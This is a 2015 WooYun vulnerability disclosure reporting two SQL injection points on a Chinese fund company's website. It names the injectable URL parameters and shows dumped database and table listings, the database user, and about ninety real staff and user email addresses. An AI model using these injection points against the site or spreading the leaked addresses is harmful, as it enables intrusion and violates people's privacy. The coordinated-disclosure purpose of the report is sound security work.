当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0128700

漏洞标题:基金安全之万银财富基金主站SQL注入两枚(涉及多个库大量数据)

相关厂商:万银财富

漏洞作者: ago

提交时间:2015-07-23 18:02

修复时间:2015-09-10 20:38

公开时间:2015-09-10 20:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-23: 细节已通知厂商并且等待厂商处理中
2015-07-27: 厂商已经确认,细节仅向厂商公开
2015-08-06: 细节向核心白帽子及相关领域专家公开
2015-08-16: 细节向普通白帽子公开
2015-08-26: 细节向实习白帽子公开
2015-09-10: 细节向公众公开

简要描述:

详细说明:

http://www.wy-fund.com/index.php?m=instarea&c=inbrok&a=init&inst_id=55   参数inst_id存在注入
www.wy-fund.com/index.php?m=instarea&c=infund&inst_code=80000220 inst_code布尔型盲注

漏洞证明:

available databases [8]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] wy_blog
[*] wy_forum
[*] wy_sso
[*] wy_www
[*] wy_www_bak
current user: 'wyread@%'
Database: information_schema
[37 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_TRX |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
Database: mysql
[24 tables]
+---------------------------+
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
| user |
+---------------------------+
+------------------------+
| email |
+------------------------+
| 158156327@qq.com |
| 282702949@qq.com |
| 295817785@qq.com |
| 364522154@qq.com |
| 784100145@qq.com |
| 811088370@qq.com |
| A001@163.com |
| banrj@wy-fund.com |
| caolei@wy-fund.com |
| chenxi@wy-fund.com |
| cjq_admin@163.com |
| dfsdf@1.com |
| fancc@my-fund.com |
| fcc@163.com |
| fengxy@wy-fund.com |
| fuhongsheng@qq.com |
| guanqw@wy-fund.com |
| guxin@wy-fund.com |
| handan@wy-fund.com |
| hl@163.com |
| huangsk@wy-fund.com |
| jianghy@wy-fund.com |
| kf_admin1@163.com |
| libs@wy-fund.com |
| licw@wy-fund.com |
| lili@wy-fund.com |
| liuks@wy-fund.com |
| liurong@wy-fund.com |
| liuzy@wy-fund.com |
| luosj@wy-fund.com |
| lzr@163.com |
| mahaoyu@wy-fund.com |
| mahy@wy-fund.com |
| phpcms@163.com |
| qiupt@wy-fund.com |
| qiuyc@wy-fund.com |
| qiuyc@wy-fund.com |
| quanyao@wy-fund.com |
| shisn@wy-fund.com |
| sudongsheng555@163.com |
| sunliang@wy-fund.com |
| trm_admin@163.com |
| wangzh@wy-fund.com |
| wy@wy-fund.com |
| wyh@163.com |
| xhwy888@wy-fund.com |
| xhwydz@11.com |
| xhwy_admin1@163.com |
| xhwy_admin1@163.com |
| xhwy_admin1@163.com |
| xhwy_admin1@163.com |
| xhwy_admin1@163.com |
| xhwy_admin1@163.com |
| xhwy_admin1@163.com |
| xhwy_admin1@163.com |
| xhwy_admin1@163.com |
| xhwy_admin1@163.com |
| xhwy_admin1@163.com |
| xhwy_admin1@163.com |
| xhwy_admin1@163.com |
| xhwy_admin1@163.com |
| xhwy_admin1@163.com |
| xhwy_admin1@163.com |
| xhwy_admin1@163.com |
| xhwy_admin1@163.com |
| xhwy_admin1@163.com |
| xhwy_admin1@163.com |
| xhwy_admin1@163.com |
| xhwy_admin1@163.com |
| xhwy_admin1@163.com |
| xhwy_admin2@163.com |
| xhwy_admin3@163.com |
| xhwy_admin4@163.com |
| xhwy_admin5@163.com |
| xhwy_admin6@163.com |
| xhwy_admin7@163.com |
| xhwy_admin8@163.com |
| xhwy_admin@163.com |
| xuwei@wy-fund.com |
| zhangwei@wy-fund.com |
| zhangyj@wy-fund.com |
| zhaopin@wy-fund.com |
| zhkp12@163.com |
| zhongsl@wy-fund.com |
| zhongsl@wy-fund.com |
| zouna@my-fund.com |
| zsl@163.com |
| zxs_admin@163.com |
+------------------------+
Database: wy_www_bak
[106 tables]
+-----------------------+
| v9_admin |
| v9_admin_panel |
| v9_admin_role |
| v9_admin_role_priv |
| v9_announce |
| v9_ask_answer |
| v9_ask_category |
| v9_ask_comment |
| v9_ask_question |
| v9_ask_question_copy |
| v9_ask_zsask |
| v9_attachment |
| v9_attachment_index |
| v9_badword |
| v9_block |
| v9_block_history |
| v9_block_priv |
| v9_cache |
| v9_category |
| v9_category_priv |
| v9_collection_content |
| v9_collection_history |
| v9_collection_node |
| v9_collection_program |
| v9_comment |
| v9_comment_check |
| v9_comment_data_1 |
| v9_comment_setting |
| v9_comment_table |
| v9_content_check |
| v9_copyfrom |
| v9_datacall |
| v9_dbsource |
| v9_download |
| v9_download_data |
| v9_downservers |
| v9_extend_setting |
| v9_favorite |
| v9_hits |
| v9_ipbanned |
| v9_keylink |
| v9_link |
| v9_linkage |
| v9_log |
| v9_member |
| v9_member_detail |
| v9_member_group |
| v9_member_menu |
| v9_member_verify |
| v9_member_vip |
| v9_menu |
| v9_message |
| v9_message_data |
| v9_message_group |
| v9_model |
| v9_model_field |
| v9_module |
| v9_mood |
| v9_news |
| v9_news_data |
| v9_page |
| v9_pay_account |
| v9_pay_payment |
| v9_pay_spend |
| v9_picture |
| v9_picture_data |
| v9_plugin |
| v9_plugin_var |
| v9_position |
| v9_position_data |
| v9_poster |
| v9_poster_201301 |
| v9_poster_201302 |
| v9_poster_space |
| v9_queue |
| v9_release_point |
| v9_search |
| v9_search_keyword |
| v9_session |
| v9_site |
| v9_sms_report |
| v9_special |
| v9_special_c_data |
| v9_special_content |
| v9_sphinx_counter |
| v9_sso_admin |
| v9_sso_applications |
| v9_sso_members |
| v9_sso_messagequeue |
| v9_sso_session |
| v9_sso_settings |
| v9_tag |
| v9_template_bak |
| v9_times |
| v9_type |
| v9_urlrule |
| v9_video |
| v9_video_content |
| v9_video_data |
| v9_video_store |
| v9_vote_data |
| v9_vote_option |
| v9_vote_subject |
| v9_wap |
| v9_wap_type |
| v9_workflow |
+-----------------------+

修复方案:

参数过滤

版权声明:转载请注明来源 ago@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-07-27 20:37

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向证券业信息化主管部门通报,由其后续协调网站管理单位处置.

最新状态:

暂无